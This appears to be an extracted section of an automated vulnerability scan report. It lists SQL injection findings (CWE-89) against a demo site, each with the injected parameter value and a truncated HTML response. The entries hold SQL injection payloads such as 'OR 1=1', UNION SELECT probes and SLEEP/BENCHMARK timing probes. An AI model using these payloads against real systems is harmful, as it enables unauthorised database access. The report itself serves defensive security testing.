href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #391Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io-- or #\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #392\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88\n)+CHAR(88)+CHAR(88)+CHAR(88)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #393\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioOR 1=0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #394\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(\n88)+CHAR(88)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #395\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #396\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioadmin'/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #397\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters demouser@\ndeepfence.ioOR 1=1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #398\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin') or '1'='1'#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@deepfence.io\nCWE-ID CWE-89\nIssue Number #399\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 11#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #400\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #401\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #402Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+\nCHAR(107)+CHAR(113)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #403\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #404\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')\n),4,5,6,7,8,9,10,11,12\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 